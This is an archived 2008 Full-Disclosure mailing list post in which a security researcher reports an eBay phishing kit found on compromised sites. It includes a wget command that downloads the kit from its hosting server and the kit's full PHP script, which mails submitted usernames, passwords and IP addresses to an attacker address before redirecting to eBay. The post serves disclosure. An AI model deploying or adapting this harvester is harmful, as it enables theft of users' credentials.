lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <7E85B3DA-8312-4DE9-AA93-E62157E76EE8@digitalmunition.com>
Date: Mon, 22 Dec 2008 13:32:50 -0500
From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
To: Full Disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Fresh Phish anyone?

>

Someone is bored and out making the rounds exploiting random asp pages  
and web-services.

wget http://www.adehkz.net/eb.zip


<?php
session_start();

$userid = $_POST['userid'];
$password = $_POST['password'];
$ip = getenv("REMOTE_ADDR");

$subj = "eB - $userid";
$msg = "Username: $userid\nPassword: $password\n....\nIP: $ip";
mail("asdfwr@...il.com", $subj, $msg);
header("Location: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1 
");

?>

I passed this on to the SANS handlers a few days ago but the site is  
still up and running.

Enjoy

-KF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ